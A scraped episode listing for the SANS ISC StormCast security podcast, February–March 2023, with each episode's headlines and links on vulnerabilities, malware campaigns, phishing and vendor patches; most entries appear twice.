ISC StormCast for Thursday, March 9th, 2023

Increase in exploits against Joomla (CVE-2023-23752) https://isc.sans.edu/diary/Increase%20in%20exploits%20agains%20Joomla%20%28CVE-2023-23752%29/29614 Jenkins RCE Vulnerability https://blog.aquasec.com/jenkins-server-vulnerabilities Bitwarden: The Curious Use-Case of Password Pilfering https://flashpoint.io/blog/bitwarden-password-pilfering/ FortiOS Vulnerabilities https://www.fortiguard.com/psirt/FG-IR-23-001 Veeam Backup Vulnerabilities https://www.veeam.com/kb4245
3/9/20236 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, March 8th, 2023

Hackers Love This VSCode Extension: What You Can Do to Stay Safe https://isc.sans.edu/diary/Hackers%20Love%20This%20VSCode%20Extension%3A%20What%20You%20Can%20Do%20to%20Stay%20Safe/29610 Protecting Android Clipboard Content from Unintended Exposure https://www.microsoft.com/en-us/security/blog/2023/03/06/protecting-android-clipboard-content-from-unintended-exposure/ SYS01 Stealer Targeting Facebook Accounts https://blog.morphisec.com/sys01stealer-facebook-info-stealer
3/8/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 8th, 2023

Hackers Love This VSCode Extension: What You Can Do to Stay Safe https://isc.sans.edu/diary/Hackers%20Love%20This%20VSCode%20Extension%3A%20What%20You%20Can%20Do%20to%20Stay%20Safe/29610 Protecting Android Clipboard Content from Unintended Exposure https://www.microsoft.com/en-us/security/blog/2023/03/06/protecting-android-clipboard-content-from-unintended-exposure/ SYS01 Stealer Targeting Facebook Accounts https://blog.morphisec.com/sys01stealer-facebook-info-stealer
3/8/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, March 7th, 2023

Scanning s3 Buckets https://isc.sans.edu/diary/Scanning%20s3%20buckets/29606 HiatusRAT Router Malware https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/ SonicWall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004 Windows Word RCE Proof-of-Concept https://twitter.com/jduck/status/1632471544935923712 https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md DBatLoader and Remcos RAT https://www.sentinelone.com/blog/dbatloader-and-remcos-rat-sweep-eastern-europe/
3/7/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, March 7th, 2023

Scanning s3 Buckets https://isc.sans.edu/diary/Scanning%20s3%20buckets/29606 HiatusRAT Router Malware https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/ SonicWall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004 Windows Word RCE Proof-of-Concept https://twitter.com/jduck/status/1632471544935923712 https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md DBatLoader and Remcos RAT https://www.sentinelone.com/blog/dbatloader-and-remcos-rat-sweep-eastern-europe/
3/7/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, March 6th, 2023

SANS.edu Commencement https://www.linkedin.com/feed/update/urn:li:activity:7037794067266625536/ SCARLETEEL: Operation Leverating Terraform, Kubernetes and AWS for data theft https://sysdig.com/blog/cloud-breach-terraform-data-theft/ Preventing Malicious OneNote Files https://www.bleepingcomputer.com/news/security/how-to-prevent-microsoft-onenote-files-from-infecting-windows-with-malware/ Redis Miner Leverages Command Line File Hosting Service https://www.cadosecurity.com/redis-miner-leverages-command-line-file-hosting-service/
3/6/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, March 6th, 2023

SANS.edu Commencement https://www.linkedin.com/feed/update/urn:li:activity:7037794067266625536/ SCARLETEEL: Operation Leverating Terraform, Kubernetes and AWS for data theft https://sysdig.com/blog/cloud-breach-terraform-data-theft/ Preventing Malicious OneNote Files https://www.bleepingcomputer.com/news/security/how-to-prevent-microsoft-onenote-files-from-infecting-windows-with-malware/ Redis Miner Leverages Command Line File Hosting Service https://www.cadosecurity.com/redis-miner-leverages-command-line-file-hosting-service/
3/6/20235 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, March 3rd, 2023

YARA: Detect the Unexpected https://isc.sans.edu/diary/YARA%3A%20Detect%20The%20Unexpected%20.../29598 Drone Security and the Mysterious Case of DJI's DroneID https://github.com/RUB-SysSec/DroneSecurity Booking.com OAuth Flaw https://salt.security/blog/traveling-with-oauth-account-takeover-on-booking-com SANS.edu Student Marco Gfeller: Lightweight Python-Based Malware Analysis Pipeline https://www.sans.org/white-papers/lightweight-python-based-malware-analysis-pipeline/
3/3/202314 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, March 3rd, 2023

YARA: Detect the Unexpected https://isc.sans.edu/diary/YARA%3A%20Detect%20The%20Unexpected%20.../29598 Drone Security and the Mysterious Case of DJI's DroneID https://github.com/RUB-SysSec/DroneSecurity Booking.com OAuth Flaw https://salt.security/blog/traveling-with-oauth-account-takeover-on-booking-com SANS.edu Student Marco Gfeller: Lightweight Python-Based Malware Analysis Pipeline https://www.sans.org/white-papers/lightweight-python-based-malware-analysis-pipeline/
3/3/202314 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, March 2nd, 2023

Python Infostealer Targeting Gamers https://isc.sans.edu/diary/Python%20Infostealer%20Targeting%20Gamers/29596 DNS Abuse Techniques Matrix https://www.first.org/global/sigs/dns/DNS-Abuse-Techniques-Matrix_v1.1.pdf BlackLotus UEFI Bootkit https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ TCG TPM2.0 implementations vulnerable to memory corruption https://kb.cert.org/vuls/id/782720 Aruba Vulnerability https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-002.txt Cisco VoIP Phone WebUI RCE https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-cmd-inj-KMFynVcP
3/2/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, March 2nd, 2023

Python Infostealer Targeting Gamers https://isc.sans.edu/diary/Python%20Infostealer%20Targeting%20Gamers/29596 DNS Abuse Techniques Matrix https://www.first.org/global/sigs/dns/DNS-Abuse-Techniques-Matrix_v1.1.pdf BlackLotus UEFI Bootkit https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ TCG TPM2.0 implementations vulnerable to memory corruption https://kb.cert.org/vuls/id/782720 Aruba Vulnerability https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-002.txt Cisco VoIP Phone WebUI RCE https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-cmd-inj-KMFynVcP
3/2/20235 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 1st, 2023

BB11 Distribution Qakbot (Qbot) activity https://isc.sans.edu/diary/BB17%20distribution%20Qakbot%20%28Qbot%29%20activity/29592 LastPass Incident Details https://support.lastpass.com/help/incident-1-additional-details-of-the-attack https://support.lastpass.com/help/incident-2-additional-details-of-the-attack CISA Red Team Shares Key Findings https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a Jailbreak Chat https://www.jailbreakchat.com
3/1/20236 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, March 1st, 2023

BB11 Distribution Qakbot (Qbot) activity https://isc.sans.edu/diary/BB17%20distribution%20Qakbot%20%28Qbot%29%20activity/29592 LastPass Incident Details https://support.lastpass.com/help/incident-1-additional-details-of-the-attack https://support.lastpass.com/help/incident-2-additional-details-of-the-attack CISA Red Team Shares Key Findings https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a Jailbreak Chat https://www.jailbreakchat.com
3/1/20236 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, February 28th, 2023

Phishing Again and Again https://isc.sans.edu/diary/Phishing%20Again%20and%20Again/29588 Unlocked Phone Stealing https://www.wsj.com/articles/apple-iphone-security-theft-passcode-data-privacya-basic-iphone-feature-helps-criminals-steal-your-digital-life-cbf14b1a More Fake Authenticator Apps https://nakedsecurity.sophos.com/2023/02/27/beware-rogue-2fa-apps-in-app-store-and-google-play-dont-get-hacked/ Zoneminder Vulnerability https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr WebLogic Exploit (not verified) CVE-2023-21839 https://github.com/4ra1n/CVE-2023-21839/blob/master/cmd/main.go
2/28/20235 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, February 28th, 2023

Phishing Again and Again https://isc.sans.edu/diary/Phishing%20Again%20and%20Again/29588 Unlocked Phone Stealing https://www.wsj.com/articles/apple-iphone-security-theft-passcode-data-privacya-basic-iphone-feature-helps-criminals-steal-your-digital-life-cbf14b1a More Fake Authenticator Apps https://nakedsecurity.sophos.com/2023/02/27/beware-rogue-2fa-apps-in-app-store-and-google-play-dont-get-hacked/ Zoneminder Vulnerability https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr WebLogic Exploit (not verified) CVE-2023-21839 https://github.com/4ra1n/CVE-2023-21839/blob/master/cmd/main.go
2/28/20235 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, February 27th, 2023

URL Files and WebDav used for IcedId Bockbot Infection https://isc.sans.edu/diary/URL%20files%20and%20WebDAV%20used%20for%20IcedID%20%28Bokbot%29%20infection/29578 oledump msi file plugin https://isc.sans.edu/diary/oledump%20%26%20MSI%20Files/29584 Automatic Disruption of Ransomware and BEC attacks with Microsoft 365 Defender https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294 Cisco Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-csrfv-DMx6KSwV https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-lldp-dos-ySCNZOpX
2/27/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, February 27th, 2023

URL Files and WebDav used for IcedId Bockbot Infection https://isc.sans.edu/diary/URL%20files%20and%20WebDAV%20used%20for%20IcedID%20%28Bokbot%29%20infection/29578 oledump msi file plugin https://isc.sans.edu/diary/oledump%20%26%20MSI%20Files/29584 Automatic Disruption of Ransomware and BEC attacks with Microsoft 365 Defender https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294 Cisco Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-csrfv-DMx6KSwV https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-lldp-dos-ySCNZOpX
2/27/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, February 24th, 2023

Updated Exchange AV Guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/update-on-the-exchange-server-antivirus-exclusions/ba-p/3751464 Best Practices for Securing Your Home Network https://media.defense.gov/2023/Feb/22/2003165170/-1/-1/0/CSI_BEST_PRACTICES_FOR_SECURING_YOUR_HOME_NETWORK.PDF Attacks on Data Center Organizations https://www.resecurity.com/blog/article/cyber-attacks-on-data-center-organizations NPM Package Phishing https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/ Malicious PyPi Packages https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-new-malicious-python-packages-in-pypi
2/24/20235 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, February 24th, 2023

Updated Exchange AV Guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/update-on-the-exchange-server-antivirus-exclusions/ba-p/3751464 Best Practices for Securing Your Home Network https://media.defense.gov/2023/Feb/22/2003165170/-1/-1/0/CSI_BEST_PRACTICES_FOR_SECURING_YOUR_HOME_NETWORK.PDF Attacks on Data Center Organizations https://www.resecurity.com/blog/article/cyber-attacks-on-data-center-organizations NPM Package Phishing https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/ Malicious PyPi Packages https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-new-malicious-python-packages-in-pypi
2/24/20235 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, February 23rd, 2023

Internet Wide Scan Fingerprinting Confluence Servers https://isc.sans.edu/diary/Internet%20Wide%20Scan%20Fingerprinting%20Confluence%20Servers/29574 Apple Updates Advisories https://support.apple.com/en-us/HT213606 https://support.apple.com/en-us/HT213605 https://www.trellix.com/en-us/about/newsroom/stories/research/trellix-advanced-research-center-discovers-a-new-privilege-escalation-bug-class-on-macos-and-ios.html Questionable two-factor Apps https://twitter.com/mysk_co/status/1627097291063435264 VMWare Carbon Black App Control Vulnerability https://www.vmware.com/security/advisories/VMSA-2023-0004.html
2/23/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, February 23rd, 2023

Internet Wide Scan Fingerprinting Confluence Servers https://isc.sans.edu/diary/Internet%20Wide%20Scan%20Fingerprinting%20Confluence%20Servers/29574 Apple Updates Advisories https://support.apple.com/en-us/HT213606 https://support.apple.com/en-us/HT213605 https://www.trellix.com/en-us/about/newsroom/stories/research/trellix-advanced-research-center-discovers-a-new-privilege-escalation-bug-class-on-macos-and-ios.html Questionable two-factor Apps https://twitter.com/mysk_co/status/1627097291063435264 VMWare Carbon Black App Control Vulnerability https://www.vmware.com/security/advisories/VMSA-2023-0004.html
2/23/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, February 22nd, 2023

Phishing Page Branded with Your Corporate Website https://isc.sans.edu/diary/Phishing%20Page%20Branded%20with%20Your%20Corporate%20Website/29570 Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ Apache Commons FileUpload Vulnerability https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy VMWare Windows Server 2022 Fix https://docs.vmware.com/en/VMware-vSphere/7.0/rn/vsphere-esxi-70u3k-release-notes.html#resolvedissues
2/22/20234 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, February 22nd, 2023

Phishing Page Branded with Your Corporate Website https://isc.sans.edu/diary/Phishing%20Page%20Branded%20with%20Your%20Corporate%20Website/29570 Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ Apache Commons FileUpload Vulnerability https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy VMWare Windows Server 2022 Fix https://docs.vmware.com/en/VMware-vSphere/7.0/rn/vsphere-esxi-70u3k-release-notes.html#resolvedissues
2/22/20234 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, February 21st, 2023

OneNote Suricata Rules https://isc.sans.edu/diary/OneNote%20Suricata%20Rules/29564 New IIS Backdoor https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis Outlook Spam https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-flooded-with-spam-due-to-broken-email-filters/ Godaddy Breach and Website Redirects https://aboutus.godaddy.net/newsroom/company-news/news-details/2023/Statement-on-recent-website-redirect-issues/default.aspx
2/21/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, February 21st, 2023

OneNote Suricata Rules https://isc.sans.edu/diary/OneNote%20Suricata%20Rules/29564 New IIS Backdoor https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis Outlook Spam https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-flooded-with-spam-due-to-broken-email-filters/ Godaddy Breach and Website Redirects https://aboutus.godaddy.net/newsroom/company-news/news-details/2023/Statement-on-recent-website-redirect-issues/default.aspx
2/21/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, February 20th, 2023

Phishing Emails to out Handlers Inbox https://isc.sans.edu/diary/Spear%20Phishing%20Handlers%20for%20Username%20Password/29560 Twitter Alters 2FA https://blog.twitter.com/en_us/topics/product/2023/an-update-on-two-factor-authentication-using-sms-on-twitter Fortinet Updates https://www.fortiguard.com/psirt-monthly-advisory/february-2023-vulnerability-advisories https://twitter.com/Horizon3Attack/status/1626692778062237713 Cisco ClamAV Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-q8DThCy
2/20/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, February 20th, 2023

Phishing Emails to out Handlers Inbox https://isc.sans.edu/diary/Spear%20Phishing%20Handlers%20for%20Username%20Password/29560 Twitter Alters 2FA https://blog.twitter.com/en_us/topics/product/2023/an-update-on-two-factor-authentication-using-sms-on-twitter Fortinet Updates https://www.fortiguard.com/psirt-monthly-advisory/february-2023-vulnerability-advisories https://twitter.com/Horizon3Attack/status/1626692778062237713 Cisco ClamAV Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-q8DThCy
2/20/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, February 17th, 2023

HTML Phishing Attachment with Browser-in-the-Browser Technique https://isc.sans.edu/diary/HTML%20phishing%20attachment%20with%20browser-in-the-browser%20technique/29556 Windows Server 2022 Might Not Start Up After Updates https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#windows-server-2022-might-not-start-up New ESXiArgs Encryption Routing Outmaneuvers Recovery Methods https://www.malwarebytes.com/blog/news/2023/02/new-esxiargs-encryption-routine-outmaneuvers-recovery-methods PHP Updates https://www.php.net ClamAV Patches https://blog.clamav.net/2023/02/clamav-01038-01052-and-101-patch.html
2/17/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, February 17th, 2023

HTML Phishing Attachment with Browser-in-the-Browser Technique https://isc.sans.edu/diary/HTML%20phishing%20attachment%20with%20browser-in-the-browser%20technique/29556 Windows Server 2022 Might Not Start Up After Updates https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#windows-server-2022-might-not-start-up New ESXiArgs Encryption Routing Outmaneuvers Recovery Methods https://www.malwarebytes.com/blog/news/2023/02/new-esxiargs-encryption-routine-outmaneuvers-recovery-methods PHP Updates https://www.php.net ClamAV Patches https://blog.clamav.net/2023/02/clamav-01038-01052-and-101-patch.html
2/17/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, February 16th, 2023

DNS Recon Redux https://isc.sans.edu/diary/DNS%20Recon%20Redux%20-%20Zone%20Transfers%20%28plus%20a%20time%20machine%29%20for%20When%20You%20Can%27t%20do%20a%20Zone%20Transfer/29552 GitHub Copilot Update https://github.blog/2023-02-14-github-copilot-now-has-a-better-ai-model-and-new-capabilities/ Hyundai Software Update https://www.hyundaiantitheft.com Citrix Patches CVE-2023-24486, CVE-2023-24484, CVE-2023-24485, and CVE-2023-24483 https://www.cisa.gov/uscert/ncas/current-activity/2023/02/14/citrix-releases-security-updates-workspace-apps-virtual-apps-and HA Proxy Patch CVE-2023-25725 https://www.mail-archive.com/[email protected]/msg43229.html Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-05/
2/16/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, February 16th, 2023

DNS Recon Redux https://isc.sans.edu/diary/DNS%20Recon%20Redux%20-%20Zone%20Transfers%20%28plus%20a%20time%20machine%29%20for%20When%20You%20Can%27t%20do%20a%20Zone%20Transfer/29552 GitHub Copilot Update https://github.blog/2023-02-14-github-copilot-now-has-a-better-ai-model-and-new-capabilities/ Hyundai Software Update https://www.hyundaiantitheft.com Citrix Patches CVE-2023-24486, CVE-2023-24484, CVE-2023-24485, and CVE-2023-24483 https://www.cisa.gov/uscert/ncas/current-activity/2023/02/14/citrix-releases-security-updates-workspace-apps-virtual-apps-and HA Proxy Patch CVE-2023-25725 https://www.mail-archive.com/[email protected]/msg43229.html Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-05/
2/16/20235 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, February 15th, 2023

Microsoft February 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202023%20Patch%20Tuesday/29548 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Intel OpenBMC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00737.html
2/15/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, February 15th, 2023

Microsoft February 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202023%20Patch%20Tuesday/29548 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Intel OpenBMC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00737.html
2/15/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, February 14th, 2023

Apple Patches Exploited Vulnerablity https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerability/29544 Venmo Phishing Abusing LinkedIn "slink" https://isc.sans.edu/diary/Venmo+Phishing+Abusing+LinkedIn+slink/29542/ Malicious PyPi Packages Install Browser Extensions https://blog.phylum.io/phylum-discovers-revived-crypto-wallet-address-replacement-attack
2/14/20235 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, February 14th, 2023

Apple Patches Exploited Vulnerablity https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerability/29544 Venmo Phishing Abusing LinkedIn "slink" https://isc.sans.edu/diary/Venmo+Phishing+Abusing+LinkedIn+slink/29542/ Malicious PyPi Packages Install Browser Extensions https://blog.phylum.io/phylum-discovers-revived-crypto-wallet-address-replacement-attack
2/14/20235 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, February 13th, 2023

Obfuscated Deactivation of Script Block Logging https://isc.sans.edu/diary/Obfuscated%20Deactivation%20of%20Script%20Block%20Logging/29538 PCAP Data Analysis with Zeek https://isc.sans.edu/diary/PCAP%20Data%20Analysis%20with%20Zeek/29530 Bing Chat Prompt Injection https://arstechnica.com/information-technology/2023/02/ai-powered-bing-chat-spills-its-secrets-via-prompt-injection-attack/ More Malicious Python Packages https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
2/13/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, February 13th, 2023

Obfuscated Deactivation of Script Block Logging https://isc.sans.edu/diary/Obfuscated%20Deactivation%20of%20Script%20Block%20Logging/29538 PCAP Data Analysis with Zeek https://isc.sans.edu/diary/PCAP%20Data%20Analysis%20with%20Zeek/29530 Bing Chat Prompt Injection https://arstechnica.com/information-technology/2023/02/ai-powered-bing-chat-spills-its-secrets-via-prompt-injection-attack/ More Malicious Python Packages https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
2/13/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, February 10th, 2023

A Backdoor with Smart Screenshot Capability https://isc.sans.edu/diary/A%20Backdoor%20with%20Smart%20Screenshot%20Capability/29534 KeePass Patches Issue Allowing Password Export https://keepass.info/news/n230109_2.53.html AWS Phishing via Google Ads https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/ Apache Kafka Vulnerability https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
2/10/20235 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, February 10th, 2023

A Backdoor with Smart Screenshot Capability https://isc.sans.edu/diary/A%20Backdoor%20with%20Smart%20Screenshot%20Capability/29534 KeePass Patches Issue Allowing Password Export https://keepass.info/news/n230109_2.53.html AWS Phishing via Google Ads https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/ Apache Kafka Vulnerability https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
2/10/20235 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, February 9th, 2023

Simple HTML Phishing via Telegram Bot https://isc.sans.edu/forums/diary/Simple%20HTML%20Phishing%20via%20Telegram%20Bot/29528/ Recovering from ESXiArgs Ransomware https://www.cisa.gov/uscert/ncas/alerts/aa23-039a NIST Standardizes Lightweight Cryptography https://csrc.nist.gov/Projects/lightweight-cryptography Sonicwall Web Content Filtering on Windows 11 22H2 https://www.sonicwall.com/support/product-notification/limitation-with-web-content-filtering-on-windows-11-22h2/230208075107457/ Google Chrome Release Changes https://developer.chrome.com/blog/early-stable/
2/9/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, February 9th, 2023

Simple HTML Phishing via Telegram Bot https://isc.sans.edu/forums/diary/Simple%20HTML%20Phishing%20via%20Telegram%20Bot/29528/ Recovering from ESXiArgs Ransomware https://www.cisa.gov/uscert/ncas/alerts/aa23-039a NIST Standardizes Lightweight Cryptography https://csrc.nist.gov/Projects/lightweight-cryptography Sonicwall Web Content Filtering on Windows 11 22H2 https://www.sonicwall.com/support/product-notification/limitation-with-web-content-filtering-on-windows-11-22h2/230208075107457/ Google Chrome Release Changes https://developer.chrome.com/blog/early-stable/
2/9/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, February 8th, 2023

A Survey of Bluetooth Vulnerabilities Trends https://isc.sans.edu/diary/A%20Survey%20of%20Bluetooth%20Vulnerabilities%20Trends%20%282023%20Edition%29/29522 OpenSSL Vulnerabilities / Patches https://www.openssl.org/news/secadv/20230207.txt Packet Tuesday: Most Frequent DNS Query ID / DNS Notify https://www.youtube.com/watch?v=QgCuE_zKyMY GoAnywhere MFT Patch Available (and PoC) https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html https://my.goanywhere.com/webclient/Dashboard.xhtml Qakbot Mechanizes Distribution of Malicous OneNote Notebooks https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/
2/8/20236 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, February 8th, 2023

A Survey of Bluetooth Vulnerabilities Trends https://isc.sans.edu/diary/A%20Survey%20of%20Bluetooth%20Vulnerabilities%20Trends%20%282023%20Edition%29/29522 OpenSSL Vulnerabilities / Patches https://www.openssl.org/news/secadv/20230207.txt Packet Tuesday: Most Frequent DNS Query ID / DNS Notify https://www.youtube.com/watch?v=QgCuE_zKyMY GoAnywhere MFT Patch Available (and PoC) https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html https://my.goanywhere.com/webclient/Dashboard.xhtml Qakbot Mechanizes Distribution of Malicous OneNote Notebooks https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/
2/8/20236 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, February 7th, 2023

Earthquake Scams https://isc.sans.edu/diary/Earthquake%20in%20Turkey%20and%20Syria%3A%20Be%20Aware%20of%20Possible%20Donation%20Scams/29518 APIs Used By Bots to Detect Public IP Addresses https://isc.sans.edu/diary/APIs+Used+by+Bots+to+Detect+Public+IP+address/29516/ OpenSSH Vulnerablity Details CVE 2023-25136 https://blog.qualys.com/vulnerabilities-threat-research/2023/02/03/cve-2023-25136-pre-auth-double-free-vulnerability-in-openssh-server-9-1 A Novel State-of-the-Art Redis Malware https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware?&web_view=true
2/7/20236 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, February 7th, 2023

Earthquake Scams https://isc.sans.edu/diary/Earthquake%20in%20Turkey%20and%20Syria%3A%20Be%20Aware%20of%20Possible%20Donation%20Scams/29518 APIs Used By Bots to Detect Public IP Addresses https://isc.sans.edu/diary/APIs+Used+by+Bots+to+Detect+Public+IP+address/29516/ OpenSSH Vulnerablity Details CVE 2023-25136 https://blog.qualys.com/vulnerabilities-threat-research/2023/02/03/cve-2023-25136-pre-auth-double-free-vulnerability-in-openssh-server-9-1 A Novel State-of-the-Art Redis Malware https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware?&web_view=true
2/7/20236 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, February 6th, 2023

Assemblyline as a Malware Analysis Sandbox https://isc.sans.edu/diary/Assemblyline%20as%20a%20Malware%20Analysis%20Sandbox/29510 GoAnywhere MFT zero-day Exploited https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ Ransomware targeting VMware ESXi https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/ Jira Service Managment Server and Data Center Advisory CVE-2023-22501 https://confluence.atlassian.com/jira/jira-service-management-server-and-data-center-advisory-cve-2023-22501-1188786458.html OpenSSH Update https://www.openssh.com/releasenotes.html F5 BigIP Vulnerability CVE-2023-22374 https://my.f5.com/manage/s/article/K000130415
2/6/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, February 6th, 2023

Assemblyline as a Malware Analysis Sandbox https://isc.sans.edu/diary/Assemblyline%20as%20a%20Malware%20Analysis%20Sandbox/29510 GoAnywhere MFT zero-day Exploited https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ Ransomware targeting VMware ESXi https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/ Jira Service Managment Server and Data Center Advisory CVE-2023-22501 https://confluence.atlassian.com/jira/jira-service-management-server-and-data-center-advisory-cve-2023-22501-1188786458.html OpenSSH Update https://www.openssh.com/releasenotes.html F5 BigIP Vulnerability CVE-2023-22374 https://my.f5.com/manage/s/article/K000130415
2/6/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, February 3rd, 2023

